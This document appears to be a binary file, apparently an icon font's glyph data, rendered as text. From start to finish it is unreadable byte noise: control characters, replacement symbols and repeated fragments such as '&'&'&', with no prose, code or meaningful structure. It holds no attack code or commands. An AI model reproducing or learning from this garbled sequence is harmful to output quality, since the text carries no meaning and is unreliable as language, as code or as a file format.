�
�	�
@

&
sm
>h	J,�d�R<p����7476?676/&4?676767>'&'&'&'&776?66/&6?6?6./&'&/.4567676=4676&'&'&'&'&&'5&7676264.'672�
$,%L<8!#+
U,3 
#J'%�	3	
?	?r=JNL	
-
5BC&�fB`cRMB_!ƴ�Z[UI"*	%N.&%	+].

	1,3
 	=
	

�
	;4"8 
+@G+$?V""LVV+����Aex���%&'&'&>7>'&''&/.46?6767672'676?676&'67656/&'&&6'%&'&>%67&'76'&'&&'&'&6	��#

!)4=,}}" M&C|a
$8'3*
+
	:C&(

Mi��

n�%�G92+�X
�
!	"
�.��
	
	
	
)"
	�	"#)		
 (
	U��?� �$
g-�	
	%�	Y'
�j�e/K`}�����"#&36;66?654'&'7"73366?65&'&3!73737>'&/&'&.#'";626/&;6767&'&'&'&'&#3;767&'&'&'&#!"#"632767676'.7"#"632767676'.&#"76362656&'1362656'&#"76�$G$ &J2
c1-^&
�-�c25j5ѮAD=�=�

��	
"�P(��#
(�
#		)(		"�)			"
3$G6	-G1�)	-!A4
&:		
Z-


		u_$&"�"��

�
66	��
bq6-$)	�� cpe>))6lzY
	��	)>epc
	�	��		.
�i�R(Kv����.76'&'.'&'.476767327.7676'5&'&'&.6764547>.76/..67676765"&'&76767>&7>&'.6767>7547>2'.767>	#	�rF$	 -�aߙ
,6g|	S4 !
3
"�GI"
@HD}*,
�\
FZF#�
J+7>)
$U�L$
 $�
1.	* $

 

CR"�\r+6&<K]{�LAZn'�
7'J����4)"fqId2"!	" >59F2 &,6;+:N>V�`
!-8X�=2;42
�i	d\Oo)#"$ /

!(`I���B&"2?64'2?64/&"&/6764/&"27677676�O�SS�O�/]�
�@~AV,%/1�P�SS�P��/]�	�B�E\.��#
4)
�����	0@Wr����'47671676'&'&646547676?.%6&'&#"7606?67&'&"6&/&'&'&"'>'474.6'9&'&'&'&'56.'">.'4;262"&+"&5"&4627".4>2&'&76/&#'&'&'5&'&9?67676767>'&%2;2+""&46"&462'".4>2#	

L6K*$1'4��	>&.
(361/	�
1533^]��	,

	%�

 	
�	
!
6"3 "
6jS*5�&&+		

/O..O^N..O�k!


.5*Sj6
	 
3"��
&&




".O..O\O/.OA!	k6('	�)D 	^7 �

	
	6*




�
- 		+@>�.
	Ifm`K�H



3.O]O..O]O.S	
	 -	
 `mfI	
	

.�>@~
�'



3.O]O..O]O.�����U^kt�&'&'&'.'&/.67>'&'&'&76'&'&'&7676>76.2"&46".4>2462"&".>l+/$!	,I&#0"$	&Plr/2;

$51

(+VvtY@�U�,MYJ++IZK,��.K+(HZP/,LJ 	
	%13&	-rpV(!ft5%(%'
3!	&15ErL P95r`i��.N--KZK*)Ie��(I[L,+LXJ,��j�_@Ww�&/&'&76&/&'&&'.7>76767676'4'.#"&#.'456'&'&/&7>&'&'&56?6376��	
	
 C��>eR^�LofdCE#/	
#D4
	2'��.,LO[cTR.10.�]`QP.0i


>,Y1[�	
�(&.J�}J}S&%QSoP�B
	
"E4'2V]QO.1/.QTd^OMZ..NQ�
X^^x0
G&%+�g�S
a}��19%9793676?6&'#9'&'&'&/&'&'#77676?6'&'&/&'&'&/6767675.+"327%76?67676/&'&+%&'&'&'&'&/&'&'&'&'&&76?3767676���hb~ 

 
#*:=LLLL=:*#
E 	�


��	

�	y	#*5$ 
 $5)#	
&(+J�*-I,&'
>�F&b


  


"+3

3+"}





�
	
  
	
		�j�R#'+/3C#3264&#!";#"3!264&3##3#3#3#3#35#57.5462��X





�
�YY��dd�NN�XX�NN�YYY"
Sm��m���m��m��m��m��LF
H�j�WCYblv�����U`k67676'&/'&'&"'.76&'.7>'&>>76>7676&'&'.%2>.72654&>56&">&'&7>.36..'&'56'&#&'&'.3%26454"&462"&4625.&"&5.&276765>;2767675624"&463".>"'&'&'4&"&'&'9"'4635>6>2#51#'"264&#'"264&#(J?
9(	


	q3PWYc-)

.;	0$>>$#oH;0H!13F�G3/K�('�{(0'('%�''SP=
-#/#-	=PDE�f�+##+		
		� -� . 
	!-%	%.!
(�)N4#
	'9	
40G36M('
32!
M,-=('FW
��!2/h.0)(.-g01#6�((�(��)6'�+'�+(�y>_	'N=4D"93g=N'	_>%1

#$1Q			:. ,,  , 
	 		 	
y*(()	�{�A!R[x�����&'.74&3!265467676&/&>54&"##"72767673%.462./&#"77676&232&7"+"&?.'&'."32>76&'&6;2&'&7"#"&76?")'%
'	� Uxh+>+$��#
	D5��$��
�'C	
6)2/D9-?��**1E�BCK��P	9
7,D2I,��M �CC0

3 	�&
	
'� 		$,,:)I

C�i��
!��;A'#"E�$B\-�9	[�A?5%KZ�O%?&.������%"'&/67>.'&'&'&#>54&"'&&767676&&'&'&676?676736#&#"!."&'.'.5&6'&#"7676?5&#76?�	)T
:4N`.B.pT13 
P(+kd'
	
'N
%0!&&&9!, #"
',@XJ.�I�c+�B'(�Q�!&)!//!(	. 	
�M
(#."
L�		
���!%%"�
	CB!2
&!

#$	�)S>)|IK&������/q�����7>'54767676?>'&'&#!"&/&/&'&'#&&76'56''&&76?6'76?676%&'&/&/.'+&&56=##&#7676776?>"#"'&'&'4'.&#&3!64&2>.2>&656'&'&�r:	

*3>
	��@!J+(1
/0.D!*EX�K+9a(

6+:
h	"7>=8"F
%4"		
�('7'&�&'7&&��1|
1��	T
		���S�p
7mW
�S
	;xK	�V	)m��

R���	�%>#
��	/3�� %
	\(9,):*);*(*�l
!�j�R��3&'3'!"3!2>54.'&'&'4;62?6'&/&'#336#463225>7>=4&#36'&'5676?.>76727.546232762!"63!2>54.Z�Z-���#;##;#<#<"#;`"'-
�
	
4-1(
$+-



-!9	���!9<#<"")";
8SS�#;"�^#;"";#�";#��	V�
�	e	 F"

oM #:#�_& ?'�#;#���@Pt�������/UXfk%'.&5463%2>'5&76&#%"?$?676767676'54'6?676&'&'&'&76?>6?6?676%"+&7!7>'&"+"3!27>'&6'&#!"7!76776?.3''3&67676767>'."67>76'&62%67676'4'79#>?>?>'&6'&'&'&6?'&'.'&'&67>6'&796767'&'&&' Q!�z


	���

:�%
�#Qa5	T��;V*#

<(J�<��	�		��
	�		
�A
	�	d7
,X*.�	
	
)



��N':A ��			/ $			�	,-


-�)

�
	g�l�G�`�`:"	
	
$H7��$
	(e3J&4!B
Ex�2	'N 3�

	P
	Y
 	
&]



	&@
	&[ 
!2����� H]p"54'.#!"'#&"#&!54.&'&'.76?64'&'&6767>726767676&'&/&'&>5&/&��
	&�A��S	O�GBO�

�$�W*U~
8Z.�t@ �8
	

"EW+-\}q-\,��!+1J	 4�bD%�	
���"�������%&'&'&'5.#"/&6?67632?67676?676'."'&'.'&##367676767632767>46&'&476?>"#"&6?>76'4?>&'&56&'&676%"'&'&467676�
	. )6
",

'
!#

 	" t�c&"'/Dz�

>#0(P		�
	
U



4�� &*
*+F?
+	


�	+#	?

		!
	

	
	;:,(
			 &	
0	
"#f

$H
8�		
;%-
)�h�Y6p������
"8LX\��%Dh{������
":Pa}�������6?'#&'&'4#'#"6'"'&'&6?676&+"6'&'&'&6267675&'&/"#"/&"&/&'&76?4'&/.'5&?6'&5&#.'56'5476/&'#.756?6?67676?6?67>76?4#/&/&'&'5&?6'&?6?>76"11#"76767676?63'&'&'&?6?6&'.?6'&/""7%326/&/&372326/4"372?676767676'0+&76763?4#&'2>&/&"736237676767'&4'4&'&/.376&"'&'&/76?6?"/&'4/&?675653276?6?#"'67676732'&/'&=46>3;'672?27272546#"&=/&76?27&'&'&/&&/326762&?'#5&'&7676&57'&/&'&'&'&74267%.7&767'&5&'"&#'&67&576&75&'&7672?6762676762#"767%&'&'#"'&'&'&36>&67273'676'&%&'/&'&'&'2676767676'671#6767672%"'&'&'&'&'43'&/&'&'.767'&7676736%&'&'#&'&'&'447>7476?6?##"=4767676&'&7474&/%&767&'5&76&676#&?&''&'&74&=42#54'#"&57&=46%
"$#

v$
	
*


$�


"
*


				'1.
��	 
@	
�&�$
�^-	--,>
*	
&�(/0#.)"E

	:	
�	
��

3
�


	 
	
"�$(
�
#�	��	�$	/�C
) 5$&2	4#x
4
!

�O	


G	&
v
	

	��
		'	K	

�
		��	+�
%>�w	
	��			�y%<O
	+	k{		>~


	!B		
	'C(Kv


	
#

	

7-
	

			


��=3|>'116.<		)
	�`0A~T+��(3/.,(:I681&
	��) -	
)
	�
%O
��	6"0/(�



�5 !
:+;
v�(
"'
4$
?0	 
	@.(	"+
	
:	$+

$>�('
/'	).$$��
(		

#

	
{	
	


@	
/
#	
4&""* V
	
*





%
	"�F!)* ��

8

=4�iR:e���&76756'&564767>4'!"6'&&363626'"+&"&'.'"&74'467>7>37232776'&'&'&'&7&'&76767'&'&'&72>54&"&'.+'";626767>=&74&0
(� 

	

$
:t�u;
�-
)5
	BB

���t

*#	
#!	
		$
	�,7N86�(	'		,*		8
'
z
	�% �S
�/

	
�X



��
�
 #		&#	�,&78M6��+	,	qr+	)	
�0

���x�CFr��8FS\���..'&?6'&'&'&=<'54766.#!&736'&3!27676'""'&56'"&=463>7>37232'&#".#"&75&>76373636#"#"'.'.56'4632674637232%6326'56'&'&'&'47>/&'&'&'.%3!265<'.&'&7676&/&'&'&'&72>54&'"!2>54&%264.766'&7>'&/&6..5&?>/&'&'&"&'5&+&"76327>7676=4&%.'&'#&72327>7>5&74&45&6'&'.'&#&3272676?67676'5&7�
	�e	
��O

%''	#
		


	#
	)'			)(		��A�`
	#/	
	
&	�	%	"
		


	
%�1>.23�F1?Z?3#33F22>D	
?
)
*
p 	
<
					��	,a
	0�/

	��	
**
$�	
		QR
					�

`	%
	&WV				(�
)"#P


	3(;
o>
	A%		%0->0920->>+1u1D12D1\Q
C
		H
	
G#��	

"

	�	
	
`		
	GE

Y
	�
	
�jsSu~����7676/&'.'&'&&7&&'.726?6567676?6226767675672?65>?67>'>.'6=4&+"#2>5#73%6=4&+"#2>5+73d$		

QX

iB		

		

	
			d--@00�^
^'BNB'�\\��^'BNB'�[[K
4	*4$		
%+	D'



��S7@ 6*#*E�>,,Z%	
z��jh.@-/@/��(

(�32���(
(�22����HNR_%6'&'&/&''#"/&'765'6?77#264&+4&+"#"3#!5%#'73#5'2>4."�/* >0
 
N
1	-	2M	
$+�m6k��o
�":"":D9""9cJ?1(1

I(
6
*I$
	�		77)��=j-�":D9""9D:"����Afv���&'.54&#*"&=4>=463623276##&76'4'&'&6?67676&#'7137264&'#353254&#&""#"#&'.'&'&/&'./.767676#4&"26�TD#		<2q%#"�"
	(
?�?	:C		!
��':H.
"
	

q

99

:;	
�
	
8T-
;6|�J'8<'&[Y	
�


$	

}:)5�

Q	

�8&!	
N
 
>Y6	S���v�An{�67>'&"36.76&/&.6767676&/&.>3727676?6&'.>32>4."2".4>*& %x<<%",$
�	�	42

(�*' ,'�0G3
#,#"
G/�,H),JTG),H+34>4 5�!&	b0�(+)}{141K��&*>	�
(,-*,Z
>��+IUG),ITG* 4>45>3������$Sg77767676767676?'&&/&'&'#7?67676767676&"+".74>;2g	
!"')-..-)'"!
	)����"jz7/','/7zj.
!		����		 
�.,,.�


6%L!!L%6'
++'6�,??,���bJSclu~��������%&'&'&'&'&/&'&'"'14&+"##37>76!5&7>76/&%676767&/&'56"6..>%">&.635&'&7#54'41#6;24+"'6?6&2;26+"76/&2=4'"�1*-=@"P9
z_71'�8'"/D
�!;rp'3XT
b-,?/-
�R .->.- 
�K	.E
�(D�6
	:0")#.
	%(2#	!z'#@>2G,@-.@,ll-?--@-mN"

	
#(

7
�f�U'7F������27654?>'&7676=4&'#&6767>'&7>75&'&4&'&/&'./6=4&+"#"#"676=!676=3>56'%6?>3!2!".672!".672'"264&%>4&`9.�7+��$� !
8$�8�K+%./�(8,+��+��+<;+0/n+<<+1<,**<++�W**;++�77 Z4	4K	
$
�8&�(&4>	
z?*��(H%!>#$!	;);u�"3
���;U=07/;U=0*<�+<*+;+,?++>-�k�Q
)6@KV^fp�������4&";265'#547>"'67&/&237264&#&#76."6'456'4&"35#""&=3"&=3"264&.+32+"&46;5#"!4623'&/&264&"7!5!!5!%4&"2!5!!"&=46;76?6?>3!2322$5$`,&Z
	
�
	

L	
s"
*e�[,e`':&&\
�	
D
	�

	�1F1W
	�w'8(':&���H��H�'9'��H��Ha��(("�'"((�%#1M
	
V	
?
				-c 	��TTT
6(':&"



"<#'$66$-E��'(7('"e"�-+�"f*�(&.5',{P(�(���"[�&/&'&'#"3!7267676&%"/&'&'&'&76?6'&676762767626762&/&'&''676762'&'&76�8N'C4�-#aR*	@�A%��
 


	
:	!�
	'!*/#85C&5

((	 


 N

		
��,Z�����73'!"&5463!22326'&'.#&#"3%6?67'&'&676?'./'"#232&'&'&#&"&'.#&"=4;66<&63"&46>.%>.74&26:
?	$&�X
�e11	.	
*T
	��	
 
	7

	
���B+L��
<Q<TV)!00C00"��0D.1C.pj4�	,$�
�@		�

				g$A	/+'0/(& H/D/0C0p!".1C.0
�j]A_hi�����	O327676&'&'&7264&"376727676'&'&'&/&74546?67676'&26."&/.'1&>2?6&'&'&'&//&36767>'&54676276%&'&'&'&6?6?6726=4>767>7676'&'&'&'&76?66?>?>27675676?65'&/.'&'&�&*$�`��>t:b` 

( @904*Q-
�
	
$:9
QS(9
<
1e1

L	(�x?,�		!
	��t
	V	

^/	!���
!jHDb!*"@_0n_#!	
	
VHLW	


%1mi@'
,	

		:��
#&
%(1W	"	���*

/

>x	3
K
,331">%%ۙ


(;
Dk�IM02-B+5


@j	$
	#	#(1
"!#/-fI.F

	 	�j}R4S`ly����&'&#.#"76766?676'&'&'676767>''&"'&'&'&'7>.3'&476367>'&"'62.7>'&'&&'.''&'&1;27671676=&76&'''&/&77>54'&'.|3.31 g<Dp3565	5	&&��*de*'3
B<E	4�12
 "Q



,�$P<@#�Ȁ���	4SE�FE4~YfXJJXe[
BWZddZWB
-�{|�*	�����/8F:=7,��Va+" 	
,bX�*	
!

$
	%%E
��<<D44:		��







�$$	66	�j�R>Pp�6&#&'&'&'&'5#'#&363567676'&>26'&&'&'767577'&'&'5'&'&'67767&&'&'&&76763!2�
)-KISSIK-)

	

kQ}Ok

	�v;3.,@-6%%6-@,.3�
;\\;8;>:]]:>;KZ.%%.ZK	
E;?&$$&?;E
	9
Ө���

+��5
))
5�55Yd $##$ h
%%%%		��'Py."#."#."#326732673267!5"#."#."!!2673267326735#."#."#."#32673267326735#.<#,$1#,$5#,$MM$,#5$,#1$,#��#5$,#1$,#�T�#,$1#,$5#,%MM$l$0$,$�#,$��$,#�$,$0$,$��$66� 6666���!1_{%#4&"#."#."#."#54&"#"3!26=4&26=326=326=3#."#."#."#5326=326=326=3!�
n�2�
��i 2 � m��3CC2 ��S�[

[�Wpp�
����
��
)Uak����%.'&"#!5!>7627#36=4'#5#27>54/&'&/6764/&'&'&"762.5467"&42?676764&'."762"&4726?67564'&'&/&"762"&4ikNQ�QNk��X@A�B?Y�HE/e


		T
	


P
�X�(**(�XkkFr!!qG�9

W	G



	U,
		

	
<""

����Ngpy}2;753754'#5"'###7&/37763632"/333267>54.#"737'#2>764'.'&"762"&4'!5!.7�+
;EI
		
0Js
	


�bU��,��P�ܨS%
	!!VvD

	

&	>|�܉L�ѺLn�j�R)2KTjt��276?>7#>7>54'&#"762"&426767654."762"&4727676764."762"&4&'&'&'#!5!E
)!

$�	#
$%	~		
	�@>dfz���[�/0.
('?  g 



\
:;
		%				��{kgEEM��wjNP]�j�R#!5����]��
��#'+/37;?C!##5#535337!''7'777!#535#53!#537!3##537#53!CBBBB� Q///////�!C�����[!C��� �C�����&�DDDD���&�0000000��p���-[��&����&Z[�j�R/?O_o���!"3!2654&+"&=46;25+"&=46;25+"&=46;2+"&=46;25+"&=46;25+"&=46;2+"&=46;25+"&=46;25+"&=46;25#!"&=463!2W�;��rrrrrr�rrrrrr�rrrrrr��R�r���		O	

	]

P		U

P

�_		O	

	]

P		U

P

�_		O	

	]

P		U

P

�

�
��/?O_o��!"3!2654&463!2#!"&5+"&=46;2+"&=46;25+"&=46;25+"&=46;2+"&=46;25+"&=46;2+"&=46;27+"&=46;2��		4		��	�		�Y		H		H	�	H		H		H		H		H		H	�	H		H		H		H	�	H		H	
I		I
	��

L	V		�

gH		H		�R		I		g		H		g		H		�Z		H		g		H		�		�		g		H		�j"JVbnz�������6767&'&37676%3&'4'&/#!"&?6767&!26%"&=462"&=462"&=462"&=462"&=462"&=462"&=462"&=462"&=462"&=462"&=462���;=FUYX`P�8*ux�b
(o!�U
	6t�	=Ƕa31
�h
	9
	9
	:	
	9	
	999999
	Y
%5V�PU(�+����~z�
�]
$1	>)X4R^a4SRm ����FO�67677#&'&#477&'>76?'677&'676?335273!2!%!353353353353374>;235335>2353353373533533
	"7.(
-34�dBU<h�6
"1	(43"&
$��-Y�Jc1����7&%%%$&$	%%$
	%%%%%%%7� +&
3?@E�I1D68BFA#L	'/$	88�6���%%KK%%L	

KK

	
KK%KK%%
�j-R'2EN�77#"&"'7'7'%"&462"&4622535#3632767654."72"&4635363273;26=3>32'335##'#54&+"#7&'#5�,(	 �(,
��Q��#z#y//$>I>%�$$2$$��4H!	-M		K.	!J44Q3 +D		F!-6OSocdl
�F
F)���%*&!,$=$$=#2##2#��3Oo5		5qN3|"
M$		$Q$��j�R'&'&&''.'54&"2"&46>1ZPv�
AAB�.%
$(�**:*)���������|
$uvFQ$���*:*)<)�jWR5BLX7676?&/&5467327&'6767'67'4>2".74&#&267�!= T-014#(?'HeL&w���?"&.5>7 6@4 �'ލp
+FB @I%=08c/9
I
�P!?0^/*�*P){&(8�O'�6 5@6 6 '�,>#/58p�jxRIOTi'>/3264&+'>54.'54&"#";26?26?337327>727'7"7'.+"&54>2u0
qG

i6$)2V45U2)$6J

(q
00
���
/	�#:u
~00-*HUH+X
�cU16\=7

6=\61Ud�
XX
��
X�77q33/YY->*G))G*7�jj[:M34?67>76#'&'&'&767676726767676&'&'&'&�M&)+==%<>+*CG@p(+N	vQT'Aqw%"X&!%QK*3IYF7='(�$%:
*Fc"ubY��)
DHoHLU@h�k
#U2<Gi0+31�����6:F6?'76&'7''&773736?72764'%".?>	Tcz

���

�<�>�
�!�
	H����,	
$\
	�
���>x@�
��
U)������}�B437'&/&'&6'&>767676?&/*LJ,�#6	
���x��
��E:
-!<rW2ZP'#5	�Θ	u�9�-	2"*L$
	;sW2�����632??64/&"'�
2
(��>��	(
j����[2
'
+=���(
j	�����j�T%AHT&'&'&6767>776&'&/&'.?67>37'&!"3!264&�1�A!N�v>:G[
�mU2bL	

Ws;5�OfZ�nM�#f
_��� S+eɗ

7+3*
	)%8,�!B\��	8K%C�fF7
	��w<D�		����7HPX���!"3!2654&!.+"#!"'&"327373?3273'&537'#5364'#364'7364/364'7"&#""4'5'4'#&#27576?22754?>?22754'&0"#"&4632?&#'#";2?4'?64&/&+"2?3237'X�8"//"�"00"�U�(��10'*

��  (>? ???{		^
	
		,	(�0"��"00"`"0�N`fww��db����	

m






N)
,*	,1=
	
2
�w�E'+ASW!!3533##5#!!3#!''7'77!!".47>?62'>2".43#�2�O/PP/O��2�����~"88!88!88"8���2

I

	>��w��PP/OO�1��/��2��"88"88!88!8���			�

	I:���8#/373535#5##37'7''%3#3#3#!!3733!73%!!�3UU3UU�<$<<$<<$<<$��������t�m~a+�+b~~��2<2��n��W4XX4��>%>>%>>%>>%t4�4.4�P��ZZhhh�W�{�A5:?DHMRbkz~�����5'&'&#"'6?5'35#5##3&/&#"!27!4%'7'#'3"+7'3#3"''&'&#"676327&'7;&"56327'%77'%7/7P	//?3
,.+0://	$M8F��	

5jj
 
R(+J=:*%%nN	/-yG+&Nn%%��#�M			
	o�崹�t=WJWh
�
l8-8f/45Gw]]wG51,�;�7	A4KL5�[K4=��B��DH�X�BR�H*�>		%				
			v?��� �x�S��T$�q6��6���\�R'%&76767%'6'7'&67672?64
oitJS"2-ZRb\K-7U9&6>[I]�cQ4/�		�	�dT\.4"VMvkr�LC,9W:"(]Kl�YQ7%/�	
�
�f�V&7>&/.676.''?3	<9	�	�1��!�
���'
�e&@<	&�&����*�
����
S�j(R#3.54623767676767
L@4,"
	"0"!,4AMR�/E;I;A/-$!%%!��$-/A;I;E/��jU%)-8<@LT!3'73'7373#.=6'&'&#%7''7''7'&'&7''7''7/&'&7#5##3L��LOL2L
;M
	��KLLKL$�LLLLL$	�&L��
؊��	$+9	8'	��					
	
�

&66�j�Y%5HNX\gv''/.?>#7%#/>3'&756?63'76#'&/&6'7/7'.7'#32673#"&'&>�����7	R

R	�!�}H�	e�E>�b*

o8�;

H���c�i	t�hb�	s��MM�d��Sr�
�t:��  ;T"E��19�-\.0-*-A(""����>1�����$1@N"1267676.67676&/&&676&6?6&/&67>?6.0e
.&,%�FB"Fd�``�;@
		�L� �G-���h��N��+
�dtB		�jU 2%&''&76&&''&'&'&#'&'&'&+'&'2�'2�)�
@�u9K �'�3)�*/�,@&)	!	'
O<�|	���z
�k����P�b"
�
	
!�
/�j�R7''7�j�k����@��j�j����@#��j�R)-&/&5!.#37676?#46;2!45#�9U��j_!	A�E.�".�~ ^�7S
��<�	��>�)-!ˎ0\\�j�R
3#3##7!=��ttZ-5����R���{��;�����"0=Ug%67676&/&76?>.'6?>.'.7>>/.76?6&/&6A!CLHI�A5�&:u
:':
t/tu�
&X�
%%= -Z���8˨U=z���=z�
��m
��C(
8�I	3��v�F?f%!4'#!#3#""3#3#"&53#3#3#3#&"3#3#"3!533533726=473353353353353353�	���//2`//�
�//__//&!`//X`��;#10	.1/1000100/^��0E..+./-
d..././.*/.-*���.-\J--\\--\\--�j�R*=Oas����677%!7&'&/&'&767264/&'67676'&'&"4'&/.36.'&'&6?4'&'&'&67&'&'&'&"67&'&'&674'&/&'&676264'&'&'n���Cf"*

�4ONi	4
3R

7	�
	
�
w
�
:

j
�r����M�
#+

��	
PQ��
65�T7O	

�

x
 �:

�
�j�R15:?DJNR���'35#5##3&/777777'7'76?3#'7&'73"#7'3#77'''''''''''''''''''''''7�

!>C>!H
L%#LI��2)E-	
-
�)G,���+fX
++	,+	++	,+!"
""
&&
&&	&&	&%����d?�[g����gL��C��:<��
(KinMMni��
-�_j~�

	





		2;2
����ǸY	�jdR26;AFJOS�'35#5##3&/7737777'7'76?3#'7&/73"#7'3673#3#3#3#3#3#3#3#3#3#3#3#3#3#d$#DJE"$OS
&TP�٨�7-K 2
10�.N����)�KK11KK11SS99SS99SS99SS99�jt™��tW��

o��!

"cf���
PUw|WW|w�`
U�y�+4 !.".!/!+"."*�jDR	AUZeipw237!2!%54&!3#3#3#3#3#3#3#3#3#3#3#3#+&#56'&7#3'&&'3#3&#'&'6�#��=�UUUU��UUUU��UUUU��UUUU]��wvI*752$$�%)2L�( 
�%88788878878�	o14&�(��#H*TA��(���&4
1
�j�R���
0@Pbo�������3#&5474&+";>74?362+"6232+&;6'#"732#";2+";6+"36'#3:#&;2#&#&;6'#"322#'";26564=6&+&;65<&+";>=454'&"654.";2657257656'4&#&7>=4&+";2=6&+454&+'"67326=&'&;6=6#"7326=&'&3'&'&/&?7654'&"326?%+"&56'56'4'.5&5463272+&=4#.'6323#76?6762"#"&564546363#s���� 

)
	
	
>
	;	



	<	
	
		

	
r�

		





				
				�ñ$	#



�kb2`$		
��(C�&'
%I
A�7�4g�`
	
		
	




		z
�Y		v�


O
	&��

	5
�
!�Y			�#	T	���&Z-
'N&>�cc�

�6
P�`.[j1#D���@$-		�
��
�
l5�
&	
7�v�FN�����76767676?>676701'&'&/>7676>767676>6767&7'27766'56?67667>76?'"6767?657&_





	



�mi'�		
VV*	






		
��nL+���*
����D"���c'�z&

	F	� >/l	
	
		



�fg&�
��\.
	



			
				���P.�}�$	�[��
J$��*�\�!B"�Q!�p�M7	'''''''''''''!���!�((%>=('%DD/.&DD/.#DD/.%ED/."�ہ+=M���B))%??))$EE//%FF0/#FF0/%EE//"�̈́*?	�j�R �����5676;7676766236!&'&'%35&74635&#"'./&'"'&'&76?'..6767'&67>7'&'&54767&'&.?&'"#&5&74'&'&'5.'&'&'&/#"&'/#'"35&>3747623747>354236547>347476%#&#5&7463635#"./356'4.#".>34'4.#"&362=&74&+&5&6;6265&74&#"'"476:656'4&'&#.54;25&74&+&'463625&74#&4;254'4''767476762%&'&76?676/./&#"&?676?'7>.'&'&75%&'4?6&/765>"#"&5>7>#7.'&
2	eMjoz+��u4
~$

 	



	
		
	


				
~47847t
 
)		

'

		(
	

��N
	��0
&'$36 @1
�,q

��*
+;)
*�,-
%"$]Z@	( (#)""9	�aI@F�, �
		
�	

!

*	
	
	
	

	
	


?
x	
					
	/
Y		$
				?���TvK
�*:(
X
'*	��#E5�_ 1{
��	������d)LE/
	-95�j�RU[���7	'7''7''7''7''7''7''7''#'7''7''7''7''7''7''7''7''7''7''7''7''7	#'7''7''7''7''7''7''7''7''7''5'7''7''7''7''7''7''7''7''7''7''7''7''%/2ߐ� S!"11!"11""21"!,,-,11"!11""12!"11"!^��g=� $%$
%%
$%
%$
	

! 
  
 !  %pY��7 ����{X�[******&&'&****++*+P��iF��s*
   
 
 
 
 	




*\T.��U���/#33!5'77'7�"
�Kl���ttL}}LttM}}��=}+s��6rه�E��E��E���jRLi|������1%#!&#/./&/6'54'56'56=4'56'56'56'5754'56'56'56'>3!2&#7>'&'&#&#&/#&4'#&67>&/&1#"3!27>'7.#32>4.#&4&'"2>%23732+"&'&?/&&47676&'.762767>+"&'&7327332+"&46332+""&=6'#"&46;26=67'!��	1#`'3� 
F&*#
�� &:,'67
l�$34(�1!�
=+0.,>$<*1<,1�9
i
a


	


]g
!3

i	
=#


			

	kh4#2�	�	�#,3'-"��9J"'((8(��
q0
78i6$J(4
'R!2�F,=090<��+=/+>/0	
�

	
�
	0

O
		

 �if-AP&'676767676&'&/6767676&%276764/&'&76'&'&62�4+DNm*J#@)7'A1.+# I�		��,
.-W0(�J^	8m�;'H]Z_M^nx
,*!)t;kJdW���32,(��
"""	�F"
[/nj��/Z+�'3	/!	
D(��"+:Cz��"&'537656?33#37>&'&462"&%2367>.462"&%&54&#"25>7637267>767>?5&%+&#657676;27'.'&676&f!'3
#! ; !��!35#* !��o
 
<=',>	�9$,!���

	`�B!
#.*# @"&'E
	
�^;,5-
: +	
70+ �8p".2	"&6&85+%7#�F$Br
7#'>
	3?��!*<E|��"'537656?3337>&'&462"&%2376767>.462"&%&54&#"267>7637265>7676767%#&+6576;72#"'5#&4735623f!�

"! ;  ��!
36#*"!��o	3	=='+?	�9$,!8
��/^8 +sMNNME
�^;+5-	: ,61, �9ow":6'76+$7$


��X>VVUU	�j�R	T�����.#!"!%!7>;#54&#!"#";;2;26=463!2;26=46;26=326=4&%46;2=4;2;2+"+"=4&+"&5463!2#!"&5#"&=46;!"&463!27#!"&=463!2+532�08��	��"(�()"

"
'

[

�
Z
"
"
	��,$++$,��
�

�N
���_��





��


���09$
�m�((�
�
�

�

�

�

�

�
�	�,,$++o

�

�+p		J


<p�h�\8�&'&'&'&'&'&6763>'.'7>7>7>&'&'&'&76'&'&'&76'&'&'&767636#7675676767>?676'&>�	(
,>8t(0E
 6)	3$.( %'�

	?E`l��Y/		E>	
s*20Y\to\S;6	
-
&<
!#
0
+$W5("$$!	
!
1�%^HO'+�mgj^SGVX��0?6Fp\Y23,'ICR
(%!""%
	#,$:	%2)!!L�f�V-7@IR[dmv��������������#,5>HQZcmv�������������	$-6?HQZclu~���������&6?6&'#&54'56?>766'&6&62.>.>..>'>.62.>.'>'&"&4>&4>7&4>7.62.>7".>7"&462'.>".767.62'.>.>7&4>'&7>7.>7&4>7.>7".>7.>5".>.>7".767".>7.>'".627.76&4>5&4>67'>&4.>5.>.>7.625.>7.>7.>5.>".627.>7'&767'&7>7&4>".>5.>7.>'>..>7".627&4>&4>762&4'>.>.>.'>.62.>&4.>'>.62".".>'>.>".'".>�x�
yy;	
	8wC���		M!		
	�	wC�U		"	P!		
���$
	�\	���D	*	.	,�),S�-	1�-.+�+,v)	J'.--()�0-(&,�+	��D\	�x�+	�-((.1	�()..�*.:	�)-S�	.1�-.+�+,v)>�gfRBS\u.'.76/&'&7677676?67676'&'&'&76767>'26."'&/&'&?`(�(620
"%4"
!*	"=L&!�8	�!++C,,=�	
*TPb0�0	+V2		l5!9/4*+H$Q[S�$	_y;Qm5 *IZ-&e
ln

+A(+@)��SH��

�g+R,6'.'&'&7676?676762>76&6&76�
'^%
U�JG~)+
-&) 
\=*/(8%'�$R@D8B�=&82I�pBB9<K[j+3< A*<5"��#:)0';?*�)
�hpW-q��6&/&01&6?6736?6&'01'/&/&.?6'&/.76'&/.?>76?>'&6?676&".7>_�<5'
��4;50'6(	
	(	��
	*&		
'
	'	
��7
��
--
O��	|<e+?8�/3;6 �?8K+	>	�/	+�	
?	+e�#
�M
G
G�
�p��j;R=FK^j!&'&#"#";";2?>=32>54.#5!2654&%632#6#'"&54>32#"+".=!��&
ZW*H*+H+ $+I**G+ �\)/4�/Q0

&A&
_5p5
 +I*�B+H+0	
	1+H+�*I+��
l	<�/Q/
&@&��"8""9!����*C��&5&'&'&'."'&767627667676?6767676'&'&76454.76762'.5&'&7>&'&1"'&'&'&'&'&67676'&'.&'&7>76>'&'&&767676?676'&&/&7676'.6?>.&'&'&?6&'&'*76'&.=4676'&#"&'&7676326&'&'&76'.&=47>'&'.767>'&6767>�l	&4/T+	gW/J(
	MDL	+$
.NJ%�%	A("(	

(
)		
	+"
"0	
!$$4+


,!,	q
			:

	
,%
$/	
	
	 
/ )
D

$
	2$ 

 �}F	@'#";Q*/(Y.<@#d.6"(
*>2x41	2!�3



(
�	-
	
H"'2	,NJ	
	
"($	1%	
-%

�S	
2 





�!		
	!	�
5
	7

